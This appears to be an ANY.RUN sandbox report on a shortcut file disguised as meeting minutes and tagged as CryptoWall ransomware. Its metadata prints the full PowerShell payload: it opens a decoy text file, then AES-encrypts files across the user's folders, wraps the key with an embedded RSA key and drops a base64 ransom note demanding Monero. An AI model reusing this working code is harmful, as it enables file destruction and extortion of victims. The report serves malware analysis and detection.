Malware analysis Project_Workshop_7th_Minutes.txt.lnk Malicious activity

Add for printing

File name:	Project_Workshop_7th_Minutes.txt.lnk
Full analysis:	https://app.any.run/tasks/6b7a622b-8b92-42fe-a0a8-d05d577e19fc
Verdict:	Malicious activity
Threats:	CryptoWall is a notorious ransomware family that emerged in early 2014 and rapidly became one of the most destructive cyber threats of its time. This malware encrypts victims' files using strong AES encryption, demands ransom payments in Bitcoin, and has generated hundreds of millions of dollars for cybercriminals. Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying. Malware Trends Tracker >>>
Analysis date:	January 31, 2026, 22:19:37
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	auto cryptowall susp-lnk ransomware
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Has command line arguments, Icon number=97, Unicoded, NoLinkInfo, ctime=Sat Jul 12 07:47:27 2025, atime=Sat Jul 12 07:47:27 2025, mtime=Sat Jul 12 07:47:27 2025, length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:	F1DCDA3C34143478344498DA8462F2B2
SHA1:	3DBB3585D48C73C5B078834BFCFE06CDC88DA26C
SHA256:	6F6F6F5A61AD1E5DF0626D058EBF456FFAE3FF9F71907C023F21EBF23A6E0914
SSDEEP:	768:RIku18ju3XHu0HrcBsri4W38Ih0/Z3QHe/xGvqZS4up:Geu3edWIUd+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Executes powershell commands (LNK)
  - powershell.exe (PID: 8820)
- CRYPTOWALL has been found (auto)
  - powershell.exe (PID: 8820)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 8820)
- Uses AES cipher (POWERSHELL)
  - powershell.exe (PID: 8820)
- Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
  - powershell.exe (PID: 8820)
- Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
  - powershell.exe (PID: 8820)
- Renames files like ransomware
  - powershell.exe (PID: 8820)
- CRYPTOWALL note has been found
  - powershell.exe (PID: 8820)
SUSPICIOUS
- Renames file via Powershell
  - powershell.exe (PID: 8820)
- Starts process via Powershell
  - powershell.exe (PID: 8820)
- Manipulates environment variables
  - powershell.exe (PID: 8820)
- Returns all items found within a container (POWERSHELL)
  - powershell.exe (PID: 8820)
- Cryptography encrypted command line is found
  - powershell.exe (PID: 8820)
- Escape characters obfuscation (POWERSHELL)
  - powershell.exe (PID: 8820)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 8820)
- Connects to SMTP port
  - powershell.exe (PID: 8820)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 8820)
INFO
- Drops script file
  - powershell.exe (PID: 8820)
- Reads security settings of Internet Explorer
  - powershell.exe (PID: 8820)
  - notepad.exe (PID: 6488)
- Reads Microsoft Office registry keys
  - powershell.exe (PID: 8820)
- Returns hidden items found within a container (POWERSHELL)
  - conhost.exe (PID: 8304)
- Create files in a temporary directory
  - powershell.exe (PID: 8820)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 8820)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 8820)
- Failed to connect to remote server (POWERSHELL)
  - powershell.exe (PID: 8820)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.lnk	\|	Windows Shortcut (100)

EXIF

LNK

Flags:	IDList, CommandArgs, IconFile, Unicode, NoLinkInfo
FileAttributes:	(none)
CreateDate:	2025:07:12 07:47:27+00:00
AccessDate:	2025:07:12 07:47:27+00:00
ModifyDate:	2025:07:12 07:47:27+00:00
TargetFileSize:	-
IconIndex:	97
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	powershell.exe
CommandLineArguments:	-ep Bypass -c "$f='C:\Users\'+$env:USERNAME+'\Downloads\Project_Workshop_7th_Minutes.txt';$c=\"MEETING MINUTES`r`nProject/Committee: Quarterly Research Progress Review`r`nTime: 10:00 AM - 11:30 AM`r`nLocation: Conference Room 301, Innovation Center`r`nChairperson: Dr. Alexandra Chen`r`nSecretary: Janna Riley`r`n`r`nATTENDEES`r`nChair, RDC Department: Dr. Alexandra Chen`r`nExternal Advisor: Prof. Benjamin Lee`r`nLead Researcher: Dr. Sophia Martinez`r`nData Analyst: Mr. James Wilson`r`nProject Coordinator: Ms. Emily Zhao`r`nAbsent with Notice: Dr. Robert Kim`r`n`r`nAGENDA ITEMS`r`n1. Review of Q2 Research Milestones`r`nDiscussion: Dr. Martinez presented progress on Phase 3 clinical trials, highlighting 85% participant enrollment completion. Prof. Lee raised concerns about data variance in Group B. Decision: Approval to allocate additional 15,000 budget for statistical consultation.`r`nAction Items:`r`n(1) Dr. Martinez to submit revised analysis report.`r`n(2) Mr. Wilson to audit Group B data anomalies.`r`n`r`n2. Publication Strategy for Findings`r`nDiscussion: Debate on prioritizing high-impact journals vs. open-access platforms. Ms. Zhao noted funding mandates requiring open-access compliance.`r`nDecision: Dual-track submission to The Lancet and institutional repository.`r`nAction Items:`r`n(1) Prof. Lee to contact Lancet editorial board.`r`n(2) Ms. Zhao to prepare preprint deposit.`r`n`r`n3. Ethics Compliance Update`r`nDiscussion: IRB flagged consent form discrepancies in Site 5 documentation.`r`nDecision: Immediate suspension of Site 5 recruitment pending audit.`r`nAction Items:`r`n(1) Dr. Chen to lead compliance review team.\";Set-Content -Path $f -Value $c -Encoding UTF8 -Force;Invoke-Item $f;$vRTfFXbX99=$eNV:USERNAME;$slFWoOrP99='C:\Users\'+$vRTfFXbX99;$AkGaihQv99=@('\Desktop','\Documents','\OneDrive','\Pictures','\Videos','\Music','\Downloads');$kEY=New-Object byte[] 16;$zyBYjPSi99=[SYsteM.SeCUrIty.CryptoGrApHy.rngCRyptoSErvicEPRovIDEr]::new();$zyBYjPSi99.GetBytes($kEY);$Key_m=[byte[]]@(0xdd,0x39,0x18,0xff,0x64,0xd4,0xfb,0xc6,0xc7,0x6e,0x89,0x82,0xff,0xca,0x9e,0xe5,0x0f,0x7b,0x30,0x8a,0xe0,0xc1,0x53,0x11,0x84,0x5a,0xac,0x09,0xca,0xf0,0xc9,0xea,0x15,0x37,0x98,0x88,0x92,0x4e,0xb4,0xce,0x12,0x51,0x7d,0xb7,0xc2,0xf3,0x54,0x96,0xd4,0x12,0x66,0xbd,0x35,0x19,0xd9,0x14,0x71,0xe6,0x3d,0x68,0x1e,0x44,0x7f,0xc9,0x85,0xf8,0x38,0x76,0x9a,0x12,0xad,0x4f,0xc6,0x0b,0x25,0x70,0x24,0x0e,0x4b,0x39,0xe8,0x59,0x25,0xe7,0x96,0x2b,0x60,0xe2,0x1c,0x58,0xbf,0x9b,0xbf,0x93,0x83,0xef,0x65,0xdd,0x02,0xa4,0xa8,0x3d,0x9d,0xd3,0x85,0xb6,0xb7,0x5a,0xe5,0x12,0x4c,0xe4,0x92,0xd2,0x0b,0x02,0xd0,0x5e,0x78,0x7d,0xb4,0x6c,0xb0,0xa9,0xda,0x2a,0xe2,0x1a,0x65,0x12,0xed,0x98,0x88,0x51,0xac,0x81,0x0c,0x5d,0x0d,0xd2,0xc7,0x17,0x7a,0x50,0x1f,0xbe,0xbe,0x64,0x33,0xb5,0x43,0x66,0x95,0xeb,0xe7,0x0e,0xd8,0x6c,0xb8,0x4e,0xac,0xf6,0x1c,0x23,0x50,0x37,0x6f,0xb3,0x77,0xeb,0xf4,0x9f,0x8c,0xf1,0x40,0x24,0x98,0x92,0xc4,0xf0,0x96,0x0f,0x43,0x65,0xaf,0xfb,0x94,0xc4,0x1f,0x14,0x08,0x56,0x8b,0xfe,0x6d,0x9a,0x5a,0x08,0xd8,0xe0,0x74,0x49,0x87,0x9e,0x4b,0x9a,0x92,0xad,0xa7,0xee,0x33,0x20,0x7c,0x75,0x2b,0x8b,0x37,0xd3,0x6c,0x6c,0x7a,0xd2,0x44,0x24,0x53,0xa7,0xc4,0xf2,0x3c,0xc5,0x79,0xcd,0x9c,0x70,0x04,0x02,0xf8,0x1f,0x44,0x99,0x96,0xe0,0x29,0xaa,0xa3,0x65,0xe9,0xe0,0x46,0x21,0x34,0xde,0x33,0xf5,0x73,0xeb);$kEY_E=[byte[]]@(0x01,0x00,0x01);$wVWNiGgX99=New-Object sysTEm.SEcUrIty.CRyPTOgrapHY.rSaParameters;$wVWNiGgX99.Modulus=$Key_m;$wVWNiGgX99.Exponent=$kEY_E;$rsa=[sysTEm.SEcUrIty.CRyPTOgrapHY.rSa]::Create();$rsa.ImportParameters($wVWNiGgX99);$VhBppDOc99=$rsa.Encrypt($kEY,[SYstem.secuRiTy.cRYPtOgRaPhY.rsAENCRyptioNPadDIng]::Pkcs1);$CYwQwYHI99=[sYsTem.BItconveRtEr]::GetBytes([SySTEm.dAtETiMEOfFseT]::UtcNow.ToUnixTimeSeconds());$PyCaWbSp99=@('.exe','.lnk','.dll','.bin','.bat','.cmd','.sys','.inf','.vxd','.ini','.cfg','.reg','.hiv','.ENCRYPT');foreach($CiWVvyXw99 in $AkGaihQv99) {$jGlkzoDW99=$slFWoOrP99+$CiWVvyXw99;if (Test-Path -LiteralPath $jGlkzoDW99) {$zaZUmabr99=Get-ChildItem -Path $jGlkzoDW99 -File -Recurse;foreach ($YWZsVfTx99 in $zaZUmabr99) {$HVEvLQGG99=$YWZsVfTx99.Extension.ToLower();if ($PyCaWbSp99 -contains $HVEvLQGG99){continue}try{$KDJdjrbK99=[syStEM.iO.File]::ReadAllBytes($YWZsVfTx99.FullName);$FcOlqhnq99=[SysTEM.seCurity.cRYPtOgraphy.AeS]::Create();$FcOlqhnq99.Key=$kEY;$FcOlqhnq99.GenerateIV();$FcOlqhnq99.Mode=[SySteM.SecuRiTY.CRypTogRapHY.ciPhErMOdE]::CBC;$FcOlqhnq99.Padding=[SYstEM.secuRITY.CrYPTOgrapHy.PaDDiNgMODe]::PKCS7;$xvrxmTkJ99=$FcOlqhnq99.CreateEncryptor();$oDCsHWcT99=$xvrxmTkJ99.TransformFinalBlock($KDJdjrbK99, 0, $KDJdjrbK99.Length);[syStEM.iO.File]::WriteAllBytes($YWZsVfTx99.FullName, $CYwQwYHI99+$VhBppDOc99+$FcOlqhnq99.IV+$oDCsHWcT99);$dWCcDFLY99=$YWZsVfTx99.Name+'.ENCRYPT';Rename-Item -Path $YWZsVfTx99.FullName -NewName $dWCcDFLY99 -Force;}finally {if ($FcOlqhnq99) { $FcOlqhnq99.Dispose();}}}$h=$jGlkzoDW99+'\DECRYPT_INSTRUCTION.html';$i=\"PCFET0NUWVBFIGh0bWw+PGh0bWwgbGFuZz0nZW4nPjxoZWFkPjxtZXRhIGNoYXJzZXQ9J3V0Zi04Jy8+PG1ldGEgY29udGVudD0nd2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCcgbmFtZT0ndmlld3BvcnQnLz48dGl0bGU+REVDUllQVCBJTlNUUlVDVElPTjwvdGl0bGU+PHN0eWxlPioge2JveC1zaXppbmc6Ym9yZGVyLWJveDt9Ym9keSB7bWluLWhlaWdodDoxMDB2aDtwYWRkaW5nOjIwcHg7fS5jb250YWluZXIge21heC13aWR0aDo5MDBweDttYXJnaW46MjBweCBhdXRvO2JhY2tncm91bmQtY29sb3I6I2ZmZjtib3JkZXItcmFkaXVzOjhweDtvdmVyZmxvdzpoaWRkZW47Ym94LXNoYWRvdzowIDVweCAxNXB4IHJnYmEoMCwgMCwgMCwgMC4xKTtib3JkZXI6MXB4IHNvbGlkICNlMGUwZTA7fS5oZWFkZXIge2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO3RleHQtYWxpZ246Y2VudGVyO2NvbG9yOndoaXRlO2Rpc3BsYXk6ZmxleDthbGlnbi1pdGVtczpjZW50ZXI7anVzdGlmeS1jb250ZW50OmNlbnRlcjtnYXA6MTVweDtib3JkZXItYm90dG9tOjJweCBzb2xpZCByZ2IoMTAwLCAwLCAyMyk7fS5sb2NrLWljb24ge2ZvbnQtc2l6ZToyNHB4O2JhY2tncm91bmQtY29sb3I6I2ZmZjtjb2xvcjpyZ2IoMTQ0LCAwLCAzMyk7d2lkdGg6NDBweDtoZWlnaHQ6NDBweDtib3JkZXItcmFkaXVzOjUwJTtkaXNwbGF5OmZsZXg7YWxpZ24taXRlbXM6Y2VudGVyO2p1c3RpZnktY29udGVudDpjZW50ZXI7fS5oZWFkZXIgaDEge2ZvbnQtc2l6ZToyNHB4O2xldHRlci1zcGFjaW5nOjAuNXB4O30uY291bnRkb3duLWNvbnRhaW5lciB7ZGlzcGxheTpmbGV4O2p1c3RpZnktY29udGVudDpzcGFjZS1hcm91bmQ7cGFkZGluZzoyMHB4O2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO2NvbG9yOndoaXRlO2JvcmRlci1ib3R0b206MXB4IHNvbGlkIHJnYigxMDAsIDAsIDIzKTt9LmNvdW50ZG93bi1ib3gge2JhY2tncm91bmQtY29sb3I6cmdiYSgwLCAwLCAwLCAwLjIpO2JvcmRlci1yYWRpdXM6NnB4O3BhZGRpbmc6MTVweCAyMHB4O3RleHQtYWxpZ246Y2VudGVyO3dpZHRoOjQwMHB4O30uY291bnRkb3duLXRpdGxlIHtmb250LXNpemU6MTZweDtmb250LXdlaWdodDpib2xkO21hcmdpbi1ib3R0b206MTBweDtjb2xvcjp3aGl0ZTt9LnRpbWVyIHtmb250LXNpemU6MjBweDtmb250LXdlaWdodDpib2xkO2xldHRlci1zcGFjaW5nOjFweDtiYWNrZ3JvdW5kLWNvbG9yOiMwMDA7Y29sb3I6I2ZmMzMzMztwYWRkaW5nOjhweDtib3JkZXItcmFkaXVzOjRweDt0ZXh0LWFsaWduOmNlbnRlcjt9Lndhcm5pbmcge2ZvbnQtc2l6ZToxM3B4O2ZvbnQtc3R5bGU6aXRhbGljO2NvbG9yOndoaXRlO3RleHQtYWxpZ246Y2VudGVyO21hcmdpbi10b3A6OHB4O30uY29udGVudCB7cGFkZGluZzozMHB4O30uc2VjdGlvbiB7bWFyZ2luLWJvdHRvbTozMHB4O30uc2VjdGlvbi10aXRsZSB7Zm9udC1zaXplOjIwcHg7bWFyZ2luLWJvdHRvbToxNXB4O2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmdiKDE0NCwgMCwgMzMpO30uc2VjdGlvbi1jb250ZW50IHtsaW5lLWhlaWdodDoxLjY7bWFyZ2luLWJvdHRvbToxNXB4O30ubW9uZXJvLWFkZHJlc3Mge21hcmdpbi10b3A6MjBweDtiYWNrZ3JvdW5kLWNvbG9yOiNmOWY5Zjk7cGFkZGluZzoyMHB4O2JvcmRlci1yYWRpdXM6NnB4O2JvcmRlci1sZWZ0OjRweCBzb2xpZCByZ2IoMTQ0LCAwLCAzMyk7fS5hZGRyZXNzLWxhYmVsIHtmb250LXNpemU6MTZweDtmb250LXdlaWdodDpib2xkO2NvbG9yOnJnYigxNDQsIDAsIDMzKTttYXJnaW4tYm90dG9tOjEwcHg7fS5hZGRyZXNzLWJveCB7ZGlzcGxheTpmbGV4O2JhY2tncm91bmQ6I2YwZjBmMDtib3JkZXI6MXB4IHNvbGlkICNkZGQ7Ym9yZGVyLXJhZGl1czo0cHg7b3ZlcmZsb3c6aGlkZGVuO21hcmdpbi10b3A6MTBweDt9LmFkZHJlc3MtaW5wdXQge2ZsZXg6MTtwYWRkaW5nOjEycHggMTVweDtmb250LXNpemU6MTRweDtib3JkZXI6bm9uZTtiYWNrZ3JvdW5kOiNmNWY1ZjU7Y29sb3I6IzMzMzt9LmdlbmVyYXRlLWJ0biB7YmFja2dyb3VuZC1jb2xvcjpyZ2IoMTQ0LCAwLCAzMyk7Y29sb3I6d2hpdGU7Ym9yZGVyOm5vbmU7bWFyZ2luLXRvcDoxMnB4O3BhZGRpbmc6MTJweCAxNXB4O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO2ZvbnQtc2l6ZToxNHB4O30uY29weS1idG4ge2JhY2tncm91bmQtY29sb3I6IzZjNzU3ZDtjb2xvcjp3aGl0ZTtib3JkZXI6bm9uZTtwYWRkaW5nOjAgMTVweDtjdXJzb3I6cG9pbnRlcjtmb250LXNpemU6MTRweDt0cmFuc2l0aW9uOmJhY2tncm91bmQtY29sb3IgMC4zczt9LmNvcHktYnRuOmhvdmVyIHtiYWNrZ3JvdW5kLWNvbG9yOiM1YTYyNjg7fS5mb290ZXIge2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO3BhZGRpbmc6MTVweDt0ZXh0LWFsaWduOmNlbnRlcjtmb250LXNpemU6MTJweDtjb2xvcjp3aGl0ZTtib3JkZXItdG9wOjFweCBzb2xpZCByZ2IoMTAwLCAwLCAyMyk7fS5jb250YWN0LWFkZHJlc3Mge2JhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTtwYWRkaW5nOjIwcHg7Ym9yZGVyLXJhZGl1czo2cHg7Ym9yZGVyLWxlZnQ6NHB4IHNvbGlkIHJnYigxNDQsIDAsIDMzKTttYXJnaW4tdG9wOjIwcHg7fS5jb250YWN0LWxhYmVsIHtmb250LXdlaWdodDpib2xkO21hcmdpbi1ib3R0b206OHB4O2NvbG9yOnJnYigxNDQsIDAsIDMzKTt9PC9zdHlsZT48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0nY29udGFpbmVyJz48ZGl2IGNsYXNzPSdoZWFkZXInPjxkaXYgY2xhc3M9J2xvY2staWNvbic+8J+UkjwvZGl2PjxoMT5ERUNSWVBUIElOU1RSVUNUSU9OPC9oMT48L2Rpdj48ZGl2IGNsYXNzPSdjb3VudGRvd24tY29udGFpbmVyJz48ZGl2IGNsYXNzPSdjb3VudGRvd24tYm94Jz48ZGl2IGNsYXNzPSdjb3VudGRvd24tdGl0bGUnPlBBWU1FTlQgRFVFIElOPC9kaXY+PGRpdiBjbGFzcz0ndGltZXInIGlkPSdwYXltZW50VGltZXInPjQ4OjAwOjAwPC9kaXY+PGRpdiBjbGFzcz0nd2FybmluZyc+QWZ0ZXIgdGhpcyB0aW1lLCB0aGUgcHJpY2Ugd2lsbCBkb3VibGU8L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdjb3VudGRvd24tYm94Jz48ZGl2IGNsYXNzPSdjb3VudGRvd24tdGl0bGUnPkZJTEVTIExPU1QgSU48L2Rpdj48ZGl2IGNsYXNzPSd0aW1lcicgaWQ9J2ZpbGVUaW1lcic+MTIwOjAwOjAwPC9kaXY+PGRpdiBjbGFzcz0nd2FybmluZyc+QWZ0ZXIgdGhpcyB0aW1lLCBkZWNyeXB0aW9uIHdpbGwgYmUgaW1wb3NzaWJsZTwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J2NvbnRlbnQnPjxkaXYgY2xhc3M9J3NlY3Rpb24nPjxkaXYgY2xhc3M9J3NlY3Rpb24tdGl0bGUnPjEuIFdoYXQgSGFwcGVuZWQ/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5Zb3VyIGltcG9ydGFudCBmaWxlcyBhcmUgZW5jcnlwdGVkLjwvcD48cD5NYW55IG9mIHlvdXIgZG9jdW1lbnRzLCBwaG90b3MsIHZpZGVvcywgZGF0YWJhc2VzIGFuZCBvdGhlciBmaWxlcyBhcmUgbm8gbG9uZ2VyIGFjY2Vzc2libGUgYmVjYXVzZSB0aGV5IGhhdmUgYmVlbiBlbmNyeXB0ZWQuIE1heWJlIHlvdSBhcmUgYnVzeSBsb29raW5nIGZvciBhIHdheSB0byByZWNvdmVyIHlvdXIgZmlsZXMsIGJ1dCBkbyBub3Qgd2FzdGUgeW91ciB0aW1lLiA8c3Ryb25nPk5vYm9keSBjYW4gcmVjb3ZlciB5b3VyIGZpbGVzIHdpdGhvdXQgb3VyIGRlY3J5cHRpb24gc2VydmljZS48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+Mi4gQ2FuIEkgUmVjb3ZlciBNeSBGaWxlcz88L2Rpdj48ZGl2IGNsYXNzPSdzZWN0aW9uLWNvbnRlbnQnPjxwPlN1cmUuIFdlIGd1YXJhbnRlZSB0aGF0IHlvdSBjYW4gcmVjb3ZlciBhbGwgeW91ciBmaWxlcyBzYWZlbHkgYW5kIGVhc2lseS4gQnV0IHlvdSBoYXZlIG5vdCBzbyBlbm91Z2ggdGltZS4gSWYgeW91IHdhbnQgdG8gZGVjcnlwdCBhbGwgeW91ciBmaWxlcywgeW91IG5lZWQgdG8gcGF5LjwvcD48cD5Zb3Ugb25seSBoYXZlIDIgZGF5cyB0byBzdWJtaXQgdGhlIHBheW1lbnQuIEFmdGVyIHRoYXQgdGhlIHByaWNlIHdpbGwgYmUgZG91YmxlZC4gPHN0cm9uZz5BbHNvLCBpZiB5b3UgZG9uJ3QgcGF5IGluIDUgZGF5cywgd2Ugd2lsbCBkaXNjbG9zZSB0aGUgcHJpdmF0ZSBkYXRhIHRvIHlvdXIgY29udGFjdHMsIGFuZCB5b3Ugd29uJ3QgYmUgYWJsZSB0byByZWNvdmVyIHlvdXIgZmlsZXMgZm9yZXZlci48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+My4gV2hhdCBhYm91dCBndWFyYW50ZWVzPzwvZGl2PjxkaXYgY2xhc3M9J3NlY3Rpb24tY29udGVudCc+PHA+SXRzIGp1c3QgYSBidXNpbmVzcy4gV2UgYWJzb2x1dGVseSBkbyBub3QgY2FyZSBhYm91dCB5b3UgYW5kIHlvdXIgZGVhbHMsIGV4Y2VwdCBnZXR0aW5nIGJlbmVmaXRzLiBJZiB3ZSBkbyBub3QgZG8gb3VyIHdvcmsgYW5kIGxpYWJpbGl0aWVzIC0gbm9ib2R5IHdpbGwgY29vcGVyYXRlIHdpdGggdXMuIEl0cyBub3QgaW4gb3VyIGludGVyZXN0cy48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+NC4gSG93IERvIEkgUGF5PzwvZGl2PjxkaXYgY2xhc3M9J3NlY3Rpb24tY29udGVudCc+PHA+UGF5bWVudCBpcyBhY2NlcHRlZCBpbiBNb25lcm8gKFhNUikgb25seS4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIGNsaWNrIDxhIGhyZWY9J2h0dHBzOi8vd3d3LmdldG1vbmVyby5vcmcvJz5BYm91dCBNb25lcm88L2E+LiBQbGVhc2UgY2hlY2sgdGhlIGN1cnJlbnQgcHJpY2Ugb2YgTW9uZXJvIGFuZCBzZW5kIHRoZSBjb3JyZWN0IGFtb3VudC4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIGNsaWNrIDxhIGhyZWY9J2h0dHBzOi8vd3d3LmtyYWtlbi5jb20vbGVhcm4vYnV5LW1vbmVyby14bXInPkhvdyB0byBidXkgTW9uZXJvPC9hPi4gT25jZSB0aGUgcGF5bWVudCBpcyBjaGVja2VkLCB3ZSBndWFyYW50ZWUgdGhhdCB5b3Ugd2lsbCBpbW1lZGlhdGVseSByZWNlaXZlIHRoZSBrZXkgYW5kIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMuPC9wPjxkaXYgY2xhc3M9J21vbmVyby1hZGRyZXNzJz48ZGl2IGNsYXNzPSdhZGRyZXNzLWxhYmVsJz5TZW5kICQ1MDAgd29ydGggb2YgTW9uZXJvIHRvIHRoaXMgYWRkcmVzczo8L2Rpdj48ZGl2IGNsYXNzPSdhZGRyZXNzLWJveCc+PGlucHV0IGNsYXNzPSdhZGRyZXNzLWlucHV0JyByZWFkb25seT0nJyB0eXBlPSd0ZXh0JyB2YWx1ZT0nOEJFTXBDdVNMNWFCRjVyRzFhOVVORmdCY1BVMTZlTlVYYlhEQnpRSnFEM0U0amRKYVVoQXczTENWSDNGNGdQVXlzaW9ZcmpzUE1hMzQ0N29Mb1N1QWhVckg3RVF0Q0MnLz48YnV0dG9uIGNsYXNzPSdjb3B5LWJ0bic+Q29weTwvYnV0dG9uPjwvZGl2PjwvZGl2PjxwPkFmdGVyIHlvdXIgcGF5bWVudCwgeW91IGNhbiBmaW5kICdUcmFuc2FjdGlvbiBJRCcgYW5kICdUcmFuc2FjdGlvbiBLZXknIG9uIHRoZSB0cmFuc2ZlcnMgcGFnZS4gVGhlc2UgSURzIGFyZSBnZW5lcmF0ZWQgdG8gcHJvdmUgdGhlIHZhbGlkaXR5IG9mIHRoZSB0cmFuc2FjdGlvbi4gUGxlYXNlIGZpbGwgaW4gdGhlIGJveGVzIGJlbG93IGFuZCBjbGljayB0aGUgW0dlbmVyYXRlIE1hY2hpbmUgSURdIGJ1dHRvbi48L3A+PGRpdiBjbGFzcz0nbW9uZXJvLWFkZHJlc3MnPjxkaXYgY2xhc3M9J2FkZHJlc3MtbGFiZWwnPlRyYW5zYWN0aW9uIElEOjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtYm94Jz48aW5wdXQgY2xhc3M9J2FkZHJlc3MtaW5wdXQnIGlkPSdUeG5JRCcgdHlwZT0ndGV4dCcvPjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtbGFiZWwnPlRyYW5zYWN0aW9uIEtleTo8L2Rpdj48ZGl2IGNsYXNzPSdhZGRyZXNzLWJveCc+PGlucHV0I